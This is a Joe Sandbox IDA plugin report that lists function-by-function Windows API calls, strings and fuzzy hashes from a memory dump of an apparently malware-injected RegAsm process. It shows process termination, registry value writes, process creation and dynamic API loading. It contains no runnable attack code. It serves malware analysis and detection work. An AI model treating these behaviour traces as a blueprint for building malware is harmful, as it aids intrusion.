\Low, xrefs: 03F0BB9F

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Temp$Filelstrcpy$NamePathTime$CountCreateCurrentDirectorySystemThreadTick
String ID: \Low
API String ID: 1629304206-4112222293
Opcode ID: 6a73626f031497f8d32faddc1de8437d3c100fc65c2da0c4c9d9a9eb2163a8ab
Instruction ID: 459ffface39dc77ecd5c0612ca5e859bc68d71ca1dbd55e945cbc5829ffa5e67
Opcode Fuzzy Hash: 6a73626f031497f8d32faddc1de8437d3c100fc65c2da0c4c9d9a9eb2163a8ab
Instruction Fuzzy Hash: AA0192B1B0162ABBD631BB7E9C59FAFB79CDF15652B090020F500D6288CB68DD0196B4

Uniqueness

Uniqueness Score: -1.00%

Function 03F13FEF, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45timeCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 03F14002
CreateWaitableTimerA.KERNEL32(00000000,00000001,?), ref: 03F14014
SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 03F1403E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 03F14051
CloseHandle.KERNEL32(?), ref: 03F1405A

Strings

0x%08X, xrefs: 03F13FFC

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: TimerWaitable$CloseCreateHandleMultipleObjectsWaitwsprintf
String ID: 0x%08X
API String ID: 603522830-3182613153
Opcode ID: 42b399b4048d912c33a07c38a703bd5b7c64d84a6dae69e9dbf012ef1b61a4ab
Instruction ID: 915d5d4055668d3af16b23623b23b8c280bae7d43a786b6410ce351577365911
Opcode Fuzzy Hash: 42b399b4048d912c33a07c38a703bd5b7c64d84a6dae69e9dbf012ef1b61a4ab
Instruction Fuzzy Hash: 95015E71900129FBDB20EB95DC09DEFBF7CEF05754F004114E566E2195DBB0A611CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F07B5D, Relevance: 9.2, APIs: 6, Instructions: 202synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

GetLastError.KERNEL32(?,?,?,00001000), ref: 03F07BDE
WaitForSingleObject.KERNEL32(00000000,00000000,?,?), ref: 03F07C63
CloseHandle.KERNEL32(00000000), ref: 03F07C7D
OpenProcess.KERNEL32(00100000,00000000,00000000,?,?), ref: 03F07CB2

Part of subcall function 03F16E8E: RtlReAllocateHeap.NTDLL(00000000,?,?,03F07C21), ref: 03F16E9E

WaitForSingleObject.KERNEL32(?,00000064), ref: 03F07D34
CloseHandle.KERNEL32(?), ref: 03F07D5B

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AllocateCloseHandleHeapObjectSingleWait$ErrorLastOpenProcess
String ID:
API String ID: 3115907006-0
Opcode ID: 27d74ebd4348edef72129ae55d9b285023d26a3da7f5bc93e37b137110ce5df1
Instruction ID: 83729a387faaa2ab8d30e68dc15a6613218a397ded69e2d36236b23688c2dc8e
Opcode Fuzzy Hash: 27d74ebd4348edef72129ae55d9b285023d26a3da7f5bc93e37b137110ce5df1
Instruction Fuzzy Hash: 13812975E0021AEFCF11EF98C884AADFBB5FF08700F148495E915EB290C771A955EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F16B58, Relevance: 9.1, APIs: 6, Instructions: 133registrysynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 03F22ECF: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 03F22F1B
Part of subcall function 03F22ECF: lstrlenW.KERNEL32(?,?,00000000), ref: 03F22F27
Part of subcall function 03F22ECF: memset.NTDLL ref: 03F22F6F
Part of subcall function 03F22ECF: FindFirstFileW.KERNEL32(00000000,00000000), ref: 03F22F8A
Part of subcall function 03F22ECF: lstrlenW.KERNEL32(0000002C), ref: 03F22FC2
Part of subcall function 03F22ECF: lstrlenW.KERNEL32(?), ref: 03F22FCA
Part of subcall function 03F22ECF: memset.NTDLL ref: 03F22FED
Part of subcall function 03F22ECF: wcscpy.NTDLL ref: 03F22FFF

WaitForSingleObject.KERNEL32(00000000,?,043A993C,?,00000000,00000000,00000001), ref: 03F16C02
RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 03F16C3C
RegSetValueExA.ADVAPI32(?,?,00000000,00000004,00000000,00000004), ref: 03F16C5F
RegCloseKey.ADVAPI32(?), ref: 03F16C68
WaitForSingleObject.KERNEL32(00000000), ref: 03F16CCC
RtlExitUserThread.NTDLL(?), ref: 03F16D02

Part of subcall function 03F083D6: CreateFileW.KERNEL32(03F0AAC3,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,03F13704,00000000,?,?), ref: 03F083F4
Part of subcall function 03F083D6: GetFileSize.KERNEL32(00000000,00000000,?,?,03F13704,00000000,?,?,?,00000000,-00000007,03F1A023,-00000007,03F0AAC3,00000000), ref: 03F08404
Part of subcall function 03F083D6: CloseHandle.KERNEL32(000000FF,?,?,03F13704,00000000,?,?,?,00000000,-00000007,03F1A023,-00000007,03F0AAC3,00000000), ref: 03F08466

Part of subcall function 03F17420: CreateFileW.KERNEL32(00000000,C0000000,03F19EF0,00000000,03F19EF1,00000080,00000000,00000000,03F24E08,74E069A0,03F19EF0,?), ref: 03F17461
Part of subcall function 03F17420: GetLastError.KERNEL32 ref: 03F1746B
Part of subcall function 03F17420: WaitForSingleObject.KERNEL32(000000C8), ref: 03F17490
Part of subcall function 03F17420: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 03F174B1
Part of subcall function 03F17420: SetFilePointer.KERNEL32(00000001,00000000,00000000,00000002), ref: 03F174D9
Part of subcall function 03F17420: WriteFile.KERNEL32(00000001,00001388,?,00000002,00000000), ref: 03F174EE
Part of subcall function 03F17420: SetEndOfFile.KERNEL32(00000001), ref: 03F174FB
Part of subcall function 03F17420: CloseHandle.KERNEL32(00000001), ref: 03F17513

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
String ID:
API String ID: 90276831-0
Opcode ID: 0a76f7faea6a373fdb79723627a01a3e95f87dabe15409bed52b029bb162562e
Instruction ID: 5fa4fe1dc2da659eadc895b36afb14e0ab9bf9187bb8b6e3d7c57e1b2ac78782
Opcode Fuzzy Hash: 0a76f7faea6a373fdb79723627a01a3e95f87dabe15409bed52b029bb162562e
Instruction Fuzzy Hash: 64518271A0020DEFDB24EFA8D895E9E7BBDFB18300F040165F914EB295D7749A46CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F0243F, Relevance: 9.1, APIs: 6, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 03F02458

Part of subcall function 03F06716: lstrlenW.KERNEL32(00000000,74E5F560,00000000,?,00000000), ref: 03F06742
Part of subcall function 03F06716: RtlAllocateHeap.NTDLL(00000000,?), ref: 03F06754
Part of subcall function 03F06716: CreateDirectoryW.KERNEL32(00000000,00000000), ref: 03F06771
Part of subcall function 03F06716: lstrlenW.KERNEL32(00000000), ref: 03F0677D
Part of subcall function 03F06716: HeapFree.KERNEL32(00000000,00000000), ref: 03F06791

RtlEnterCriticalSection.NTDLL(00000000), ref: 03F02490
CloseHandle.KERNEL32(?), ref: 03F0249E
HeapFree.KERNEL32(00000000,?,?,00000001,?,?,00001000,?,?,00001000), ref: 03F02570
RtlLeaveCriticalSection.NTDLL(00000000), ref: 03F0257F
HeapFree.KERNEL32(00000000,00000000,?,?,00001000,?,?,00001000), ref: 03F02592

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
String ID:
API String ID: 1719504581-0
Opcode ID: da9dd8daf445b0053027a1ba21c9e92855762bad39714d6c6275ee8a0e77a830
Instruction ID: cef69812098aadbf53710bcbe915a30310d24fe9807341f11f5c6c4ad47a47c9
Opcode Fuzzy Hash: da9dd8daf445b0053027a1ba21c9e92855762bad39714d6c6275ee8a0e77a830
Instruction Fuzzy Hash: E941723590060AFBDB31EFD8D8A8EAEBB79EB54700F144425E9049B194DB70DA44EB64

Uniqueness

Uniqueness Score: -1.00%

Function 03F131D3, Relevance: 9.1, APIs: 6, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89969227204b49f3b72d47c1a460a7336fe1a64ada6d89b2846a6a701583a561
Instruction ID: 29a9d925a1692ed154b4a9746fd474c609538afb51c1eeed78d835e03fb3dafb
Opcode Fuzzy Hash: 89969227204b49f3b72d47c1a460a7336fe1a64ada6d89b2846a6a701583a561
Instruction Fuzzy Hash: F741D475900746DFC730EF29AC8591BFBA8FB44364B044A2EF5AAC6580DB7098208B50

Uniqueness

Uniqueness Score: -1.00%

Function 03F1DB82, Relevance: 9.1, APIs: 6, Instructions: 104stringsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 03F1182B: lstrlen.KERNEL32(?,00000008,-00000007,?,00000000,03F136F0,?,00000000,-00000007,03F1A023,-00000007,03F0AAC3,00000000), ref: 03F1183A
Part of subcall function 03F1182B: mbstowcs.NTDLL ref: 03F11856

lstrlenW.KERNEL32(00000000,?), ref: 03F1DBD5

Part of subcall function 03F22ECF: lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 03F22F1B
Part of subcall function 03F22ECF: lstrlenW.KERNEL32(?,?,00000000), ref: 03F22F27
Part of subcall function 03F22ECF: memset.NTDLL ref: 03F22F6F
Part of subcall function 03F22ECF: FindFirstFileW.KERNEL32(00000000,00000000), ref: 03F22F8A
Part of subcall function 03F22ECF: lstrlenW.KERNEL32(0000002C), ref: 03F22FC2
Part of subcall function 03F22ECF: lstrlenW.KERNEL32(?), ref: 03F22FCA
Part of subcall function 03F22ECF: memset.NTDLL ref: 03F22FED
Part of subcall function 03F22ECF: wcscpy.NTDLL ref: 03F22FFF

PathFindFileNameW.SHLWAPI(00000000,00000000,?,?,00000000,00000000,00000000), ref: 03F1DBF6
lstrlenW.KERNEL32(03F1B2AE), ref: 03F1DC20

Part of subcall function 03F22ECF: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 03F23025
Part of subcall function 03F22ECF: RtlEnterCriticalSection.NTDLL(?), ref: 03F2305A
Part of subcall function 03F22ECF: RtlLeaveCriticalSection.NTDLL(?), ref: 03F23076
Part of subcall function 03F22ECF: FindNextFileW.KERNEL32(?,00000000), ref: 03F2308F
Part of subcall function 03F22ECF: WaitForSingleObject.KERNEL32(00000000), ref: 03F230A1
Part of subcall function 03F22ECF: FindClose.KERNEL32(?), ref: 03F230B6
Part of subcall function 03F22ECF: FindFirstFileW.KERNEL32(00000000,00000000), ref: 03F230CA
Part of subcall function 03F22ECF: lstrlenW.KERNEL32(0000002C), ref: 03F230EC

LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 03F1DC3D
WaitForSingleObject.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000), ref: 03F1DC54
PathFindFileNameW.SHLWAPI(0000001E), ref: 03F1DC69

Part of subcall function 03F154CF: lstrlenW.KERNEL32(00000000,?,00000002,00000000,?,?,?,03F1DC80,?,0000001E,?), ref: 03F154E4
Part of subcall function 03F154CF: lstrlenW.KERNEL32(00000000,?,?,?,03F1DC80,?,0000001E,?), ref: 03F154EC

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
String ID:
API String ID: 2670873185-0
Opcode ID: 9811aff5fbc4fbe028fa1f7a4173a2e11036932692da23e0b866252b778dd51f
Instruction ID: 8b5d2a6ea110407368b46d39fa971d8da6228237a28fea49c1722dcd1b0f8518
Opcode Fuzzy Hash: 9811aff5fbc4fbe028fa1f7a4173a2e11036932692da23e0b866252b778dd51f
Instruction Fuzzy Hash: DB319C7240434AEFC720EF69E88482FBBF9FF88254F04492AF584D3150EB35D9159BA2

Uniqueness

Uniqueness Score: -1.00%

Function 03F06032, Relevance: 9.1, APIs: 6, Instructions: 91timememoryCOMMON

Download Yara Rule

APIs

OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 03F0604C
CreateWaitableTimerA.KERNEL32(03F2C1A8,?,?), ref: 03F06069
GetLastError.KERNEL32(?,?), ref: 03F0607A

Part of subcall function 03F0B84E: RegQueryValueExA.KERNELBASE(00000000,03F1BD19,00000000,03F1BD19,00000000,?,00000000,00000000,00000000,00000001,74E04D40,03F1BD19,03F1BD19,?,03F1ED32,?), ref: 03F0B886
Part of subcall function 03F0B84E: RtlAllocateHeap.NTDLL(00000000,?), ref: 03F0B89A
Part of subcall function 03F0B84E: RegQueryValueExA.ADVAPI32(00000000,03F1BD19,00000000,03F1BD19,00000000,?,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40), ref: 03F0B8B4
Part of subcall function 03F0B84E: RegCloseKey.ADVAPI32(00000000,?,03F1ED32,?,03F1BD19,00000000,00000001,00000000,74E04D40,?,?,?,03F1BD19,00000000), ref: 03F0B8DE

GetSystemTimeAsFileTime.KERNEL32(?,00000000,?,?,?,?), ref: 03F060BA
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?), ref: 03F060D9
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?), ref: 03F060EF

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: TimerWaitable$HeapQueryTimeValue$AllocateCloseCreateErrorFileFreeLastOpenSystem
String ID:
API String ID: 1835239314-0
Opcode ID: e1c0a2e173cddf38927da0f5467fc08bed6c7047036ee04dbc08bfe1b3201703
Instruction ID: b2df6dfbded892ba3b8f6c3d3e7c260f63c6bbf738b08abf9cada11508d1bb98
Opcode Fuzzy Hash: e1c0a2e173cddf38927da0f5467fc08bed6c7047036ee04dbc08bfe1b3201703
Instruction Fuzzy Hash: A231AC71D0021AEBCF20EF99CD89CAFBFBEEB94745B148055F445E2191D7709A50DB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F07A8F, Relevance: 9.1, APIs: 6, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,00000020), ref: 03F07AA7
StrChrA.SHLWAPI(00000001,00000020), ref: 03F07AB8

Part of subcall function 03F19A95: lstrlen.KERNEL32(03F04EB2,?,00000000,00000000,?,03F04EB2,00000000,?,00000001,00000000,00000001), ref: 03F19AA7
Part of subcall function 03F19A95: StrChrA.SHLWAPI(00000001,0000000D,?,03F04EB2,00000000,?,00000001,00000000,00000001), ref: 03F19ADF

RtlAllocateHeap.NTDLL(00000000,?,?), ref: 03F07AF8
memcpy.NTDLL(00000000,?,00000007), ref: 03F07B25
memcpy.NTDLL(00000000,?,?,00000000,?,00000007), ref: 03F07B34
memcpy.NTDLL(?,?,?,00000000,?,?,00000000,?,00000007), ref: 03F07B46

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: memcpy$AllocateHeaplstrlen
String ID:
API String ID: 1819133394-0
Opcode ID: d8acd2c6cec1e3d60755f60fcb62647ad5a9312cdd046377b9252a3c71a1708f
Instruction ID: 09261628e16d2127a218a35a80dd5003774370601e19e75eecdac6cd579a9129
Opcode Fuzzy Hash: d8acd2c6cec1e3d60755f60fcb62647ad5a9312cdd046377b9252a3c71a1708f
Instruction Fuzzy Hash: 1C219272500219FFDB20EF98DC85F9AB7ACEF14344F054191F908DF255D670E9899BA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F2203A, Relevance: 9.1, APIs: 6, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 03F22079
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03F2208A
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,00000001,00000000,?,00000000,00000000), ref: 03F220A5
GetLastError.KERNEL32 ref: 03F220BB
HeapFree.KERNEL32(00000000,?), ref: 03F220CD
HeapFree.KERNEL32(00000000,?), ref: 03F220E2

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$ByteCharFreeMultiWide$AllocateErrorLast
String ID:
API String ID: 1822509305-0
Opcode ID: eb9e4e3e26409cee1981e30652076af781c4ef299c50981eceed5ea5ef1e5776
Instruction ID: c10f7aa9679f9175b547e6d06a22b7505ca62046f88d0a8f3dfcc724f51475b0
Opcode Fuzzy Hash: eb9e4e3e26409cee1981e30652076af781c4ef299c50981eceed5ea5ef1e5776
Instruction Fuzzy Hash: 19112C76901129FBCB32AA95DC08CEF7F7EEF552A1B104461F915E1160C6714991EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F087C4, Relevance: 9.1, APIs: 6, Instructions: 67stringCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000E39,00000000,?), ref: 03F087EC
_strupr.NTDLL ref: 03F08827
lstrlen.KERNEL32(00000000), ref: 03F0882F
TerminateProcess.KERNEL32(00000000,00000000,?,00000000,?), ref: 03F0886E
CloseHandle.KERNEL32(00000000,00000000,00000000,?,00000104), ref: 03F08875
GetLastError.KERNEL32 ref: 03F0887D

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpenTerminate_struprlstrlen
String ID:
API String ID: 110452925-0
Opcode ID: 907c3cdcafaadbcfc64dfe15e66f14cba195d9493d7ca679f17c9efc4c1d4ce7
Instruction ID: e359be4ec833e723b3697998b18920ae91cf22c05700ad3743ce49cf696ced4b
Opcode Fuzzy Hash: 907c3cdcafaadbcfc64dfe15e66f14cba195d9493d7ca679f17c9efc4c1d4ce7
Instruction Fuzzy Hash: 2611A776500209EFDB30FBB8DDD8DAE77BDAB98794B040425F906D7194EB78C840AB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F152AA, Relevance: 9.1, APIs: 6, Instructions: 66registrymemoryCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,?), ref: 03F152C8
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 03F152F6
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F15308
RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?), ref: 03F1532D
HeapFree.KERNEL32(00000000,00000000), ref: 03F15348
RegCloseKey.ADVAPI32(?), ref: 03F15352

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: HeapQueryValue$AllocateCloseFreeOpen
String ID:
API String ID: 170146033-0
Opcode ID: d53522704918c386959cc400fff120cc407a4d887ee301ce78ff5606d4f0b373
Instruction ID: 8d31b338e8e26b60549b79a5276d2149aef27b310c966a7116f9a06364582da8
Opcode Fuzzy Hash: d53522704918c386959cc400fff120cc407a4d887ee301ce78ff5606d4f0b373
Instruction Fuzzy Hash: 7511297690010DFFDB21EB99EC54CEEBBBDEB99204B1400A6F901E2128D371AE51DF20

Uniqueness

Uniqueness Score: -1.00%

Function 03F067EB, Relevance: 9.1, APIs: 6, Instructions: 65memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000F00,?,-00000001,00000000,?,?,?,03F1DF2D,?,00000000,000000FF,?,00000F00), ref: 03F067FC
lstrlen.KERNEL32(?,?,-00000001,00000000,?,?,?,03F1DF2D,?,00000000,000000FF,?,00000F00), ref: 03F06803
RtlAllocateHeap.NTDLL(00000000,00000020), ref: 03F06815
_snprintf.NTDLL ref: 03F0683B

Part of subcall function 03F0612C: memset.NTDLL ref: 03F06141
Part of subcall function 03F0612C: lstrlenW.KERNEL32(00000000,00000000,00000000,7764DBB0,00000020,00000000), ref: 03F0617A
Part of subcall function 03F0612C: wcstombs.NTDLL ref: 03F06184
Part of subcall function 03F0612C: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,7764DBB0,00000020,00000000), ref: 03F061B5
Part of subcall function 03F0612C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,03F06849), ref: 03F061E1
Part of subcall function 03F0612C: TerminateProcess.KERNEL32(?,000003E5), ref: 03F061F7
Part of subcall function 03F0612C: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,03F06849), ref: 03F0620B
Part of subcall function 03F0612C: CloseHandle.KERNEL32(?), ref: 03F0623E
Part of subcall function 03F0612C: CloseHandle.KERNEL32(?), ref: 03F06243

_snprintf.NTDLL ref: 03F0686F

Part of subcall function 03F0612C: GetLastError.KERNEL32 ref: 03F0620F
Part of subcall function 03F0612C: GetExitCodeProcess.KERNEL32(?,00000001), ref: 03F0622F

HeapFree.KERNEL32(00000000,00000000,00000000,000000FF,00000000,000000FF,?,00000F00), ref: 03F0688C

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
String ID:
API String ID: 1481739438-0
Opcode ID: a0807f9167c48b69a8467e0a3700065e4f03b285cf173464b4c437b4f49d8e5d
Instruction ID: a6e5703f356d3b62d8311721c8487370f441d5fb9dc9f825a049a3e03d43f694
Opcode Fuzzy Hash: a0807f9167c48b69a8467e0a3700065e4f03b285cf173464b4c437b4f49d8e5d
Instruction Fuzzy Hash: 0911A972900219FFCF21AF98DC94D9E3FACEF08364B154111FD19972A1C675EA61DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 03F0CBE3, Relevance: 9.1, APIs: 6, Instructions: 64memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,00000000,00000000,?,?,03F1EC57,03F139D7,00000057,00000000), ref: 03F0CBF9
RtlAllocateHeap.NTDLL(00000000,00000009,00000001), ref: 03F0CC0C
lstrcpy.KERNEL32(00000008,?), ref: 03F0CC2E
GetLastError.KERNEL32(03F1CDCF,00000000,00000000,?,?,03F1EC57,03F139D7,00000057,00000000), ref: 03F0CC57
HeapFree.KERNEL32(00000000,00000000,?,?,03F1EC57,03F139D7,00000057,00000000), ref: 03F0CC6F
CloseHandle.KERNEL32(00000000,03F1CDCF,00000000,00000000,?,?,03F1EC57,03F139D7,00000057,00000000), ref: 03F0CC78

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Heap$AllocateCloseErrorFreeHandleLastlstrcpylstrlen
String ID:
API String ID: 2860611006-0
Opcode ID: 188c45854554b78e1ef28b12fb3c8756fded7875fd058db1a28205263bc82dc0
Instruction ID: 99857dd8dc14c938cb2a56e830ec486c82560b02c340593b0f17ed1872d8e55e
Opcode Fuzzy Hash: 188c45854554b78e1ef28b12fb3c8756fded7875fd058db1a28205263bc82dc0
Instruction Fuzzy Hash: 1411B67150024DEFCB20EFA9DC84CAEBBB8FB153617148529F466C7290D7709D45EB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F1D9F4, Relevance: 9.1, APIs: 6, Instructions: 64libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

LoadLibraryA.KERNEL32(?,00000000,00000001,00000014,00000020,03F1A0EE,00000000,00000001), ref: 03F1DA14
GetProcAddress.KERNEL32(00000000,?), ref: 03F1DA33
GetProcAddress.KERNEL32(00000000,?), ref: 03F1DA48
GetProcAddress.KERNEL32(00000000,?), ref: 03F1DA5E
GetProcAddress.KERNEL32(00000000,?), ref: 03F1DA74
GetProcAddress.KERNEL32(00000000,?), ref: 03F1DA8A

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AddressProc$AllocateHeapLibraryLoad
String ID:
API String ID: 2486251641-0
Opcode ID: c53a8e6d812dfeb599fd96e6850dbc1a63262132a9bb358592147422b04d47ba
Instruction ID: dfb4273b9871d1fb8e1f65e920c6984dbbb92f72ce9715757b259160b5a05f62
Opcode Fuzzy Hash: c53a8e6d812dfeb599fd96e6850dbc1a63262132a9bb358592147422b04d47ba
Instruction Fuzzy Hash: 8C112EB2A0470BDF9760EFADECA4E6673FCAB547483094A25F905C7206D634D8028B70

Uniqueness

Uniqueness Score: -1.00%

Function 03F0FC76, Relevance: 9.1, APIs: 6, Instructions: 61stringthreadtimeCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000000,00000000,000003EE,?,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000), ref: 03F0FC88

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCA1
GetCurrentThreadId.KERNEL32 ref: 03F0FCAE
GetSystemTimeAsFileTime.KERNEL32(03F1B2AE,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?,0000000E), ref: 03F0FCBA
GetTempFileNameA.KERNEL32(00000000,00000000,03F1B2AE,00000000,?,?,?,03F1C810,00000929,00000000,?,?,03F0D87C,00000000,00000000,?), ref: 03F0FCC8
lstrcpy.KERNEL32(00000000), ref: 03F0FCEA

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
String ID:
API String ID: 1175089793-0
Opcode ID: 5c6c1741e05d0095d6b8102b566ec6232c6b4804c73f7e21808c271d17682ed0
Instruction ID: 9f407e0dad43b06bc8e16e7941c900e6b9c60c93d3e0df88a400bda141a46d4f
Opcode Fuzzy Hash: 5c6c1741e05d0095d6b8102b566ec6232c6b4804c73f7e21808c271d17682ed0
Instruction Fuzzy Hash: 0C01C833A0021AAB9731EB699C99D6BFB6CDFD5A107094025FE06D3144DB64E9059770

Uniqueness

Uniqueness Score: -1.00%

Function 03F1336B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03F133C6
SetLastError.KERNEL32(00000000,?,?,?), ref: 03F1341A

Strings

vids, xrefs: 03F13425

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: ErrorLastmemset
String ID: vids
API String ID: 3276359510-3767230166
Opcode ID: 6f4d0c67dea5f1b3f38bc36e9e72f413d11ff3e9ef564c951b1dae2b6248ab30
